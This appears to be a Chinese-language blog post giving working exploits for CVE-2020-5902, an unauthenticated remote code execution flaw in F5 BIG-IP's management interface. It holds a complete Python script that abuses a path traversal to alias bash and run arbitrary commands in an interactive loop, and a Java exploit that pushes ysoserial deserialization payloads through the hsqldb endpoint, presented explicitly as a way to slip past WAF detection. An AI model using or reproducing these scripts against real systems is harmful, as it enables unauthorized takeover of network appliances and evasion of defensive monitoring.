CVE-2020-5902 RCE的payload以及绕过方式

通过bash执行命令的 payload

通过alias = bash去绕过无法执行shell的限制。payload如下

#coding:utf-8
import requests
import json
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import uuid
import sys

# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
# fileSave.jsp?fileName=/tmp/cmd&content=id
# tmshCmd.jsp?command=list+/tmp/cmd
# tmshCmd.jsp?command=delete+cli+alias+private+list

banner = r'''
 _______  _______    ______  _________ _______   _________ _______    _______  _______  _______ 
(  ____ \(  ____ \  (  ___ \ \__   __/(  ____ \  \__   __/(  ____ )  (  ____ )(  ____ \(  ____ \
| (    \/| (    \/  | (   ) )   ) (   | (    \/     ) (   | (    )|  | (    )|| (    \/| (    \/
| (__    | (____    | (__/ /    | |   | |           | |   | (____)|  | (____)|| |      | (__    
|  __)   (_____ \   |  __ (     | |   | | ____      | |   |  _____)  |     __)| |      |  __)   
| (            ) )  | (  \ \    | |   | | \_  )     | |   | (        | (\ (   | |      | (      
| )      /\____) )  | )___) )___) (___| (___) |  ___) (___| )        | ) \ \__| (____/\| (____/\
|/       \______/   |/ \___/ \_______/(_______)  \_______/|/         |/   \__/(_______/(_______/
                                                                                                
                        CVE-2020-5902 UnAuth RCE Vuln
                            Python By Jas502n
From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
____________________________________________________________________________________________________________________________________________________
'
''

def tmshCmd_exit(url,file,cmd):
    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

    response_str = json.dumps(r.headers.__dict__['_store'])
    # print type(response_str)
    # print response_str
    if r.status_code == 200 and 'tmui' in response_str:
        # print tmshCmd_url
        print "[+] tmshCmd.jsp Exit!"
        print "[+] create cli alias private list command bash \n"
        # cmd = 'whoami'
        upload_exit(url,file,cmd)


    else:
        print "[+] tmshCmd.jsp No Exit!\n"

def upload_exit(url,file,cmd):
    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(fileSave_url,verify=False,allow_redirects=False)
    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print fileSave_url
        print "[+] fileSave.jsp Exit!\n"
        list_command(url,file)
    else:
        print "[+] fileSave.jsp No Exit!\n"

def list_command(url,file):
    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(rce_url,verify=False,allow_redirects=False)
    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print len(r.content)
    if r.status_code == 200 and 'tmui' in response_str:
        if len(r.content) > 33:
            # print rce_url
            print "[+] Command Successfull !\n"
            command_result = json.loads(r.content)
            print "_"*90,'\n\n'
            print command_result['output']
            print "_"*90,"\n\n"
            delete_list(url)
    else:
        print "[+] Command Failed !\n"

def delete_list(url):
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    r = requests.get(delete_url,verify=False,allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    response_str = json.dumps(r.headers.__dict__['_store'])
    if r.status_code == 200 and 'tmui' in response_str:
        # print delete_url
        print "[+] delete cli alias private list Successfull! \n"
    else:
        print "[+] delete cli alias private list Failed! \n"


if __name__ == '__main__':
    print banner
    while 1:
        url = "https://x.x.x.x/"
        # url = sys.argv[1]
        file = str(uuid.uuid1())
        print "/tmp/" + file,"\n"
        cmd = raw_input("[+]Set Cmd= ")
        print
        tmshCmd_exit(url,file,cmd)

通过java反序列化绕过waf的payload

上一种payload特征明显,很容易被waf等设备拦截。在这里我们可以使用java反序列化配合cve 2020-5902去执行命令。做到隐藏特征以绕过waf。

代码如下

/*
 Exploit Title: F5 BIG-IP Remote Code Execution
 Date: 2020-07-06
 Authors: Charles Dardaman of Critical Start, TeamARES
                  Rich Mirch of Critical Start, TeamARES
 CVE: CVE-2020-5902
 Requirements:
   Java JDK
   hsqldb.jar 1.8
   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
*/

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.io.IOException;
import org.hsqldb.lib.StringConverter;

public class f5RCE {

 public static void main(String[] args) {
  Connection connection;
  Statement statement;

  if(args.length != 2) {
   System.err.println("\nUsage: <hostname> <payload.txt>\n");
   System.exit(1);
  }
  String server = args[0];
  String pfile = args[1];
  String payload = null;

  try {
   payload = new String(Files.readAllBytes(Paths.get(pfile)));
   payload = payload.replaceAll("(\\n|\\r)","");
  } catch (IOException e) {
   e.printStackTrace();
  }

  String dburl = "jdbc:hsqldb:https://" + server +
                               ":443/tmui/login.jsp/..%3b/hsqldb/";

  System.out.println("Connecting to " + server);
  try {
   Class.forName("org.hsqldb.jdbcDriver");
   connection = DriverManager.getConnection(dburl, "sa","");
   statement = connection.createStatement();
   statement.execute("call \"java.lang.System.setProperty\"('org.apache.commons.collections.enableUnsafeSerialization','true')");
   statement.execute("call \"org.hsqldb.util.ScriptTool.main\"('" + payload +"');");
  } catch (java.sql.SQLException sqle) {
   // ignore java.sql.SQLException: S1000
   // General error java.lang.IllegalArgumentException: argument type mismatch
   if(sqle.getSQLState().equals("S1000") && sqle.getErrorCode() == 40) {
    System.out.println("Payload executed");
   } else {
    System.out.println("Unexpected SQL error");
    sqle.printStackTrace();
   }
   return;
  }
  catch (ClassNotFoundException cne) {
   System.err.println("Error loading db driver");
   cne.printStackTrace();
   return;
  }
 }
}

参考

  1. https://github.com/jas502n/CVE-2020-5902/blob/master/CVE-2020-5902.py
  2. https://github.com/Critical-Start/Team-Ares/blob/master/CVE-2020-5902/f5RCE.java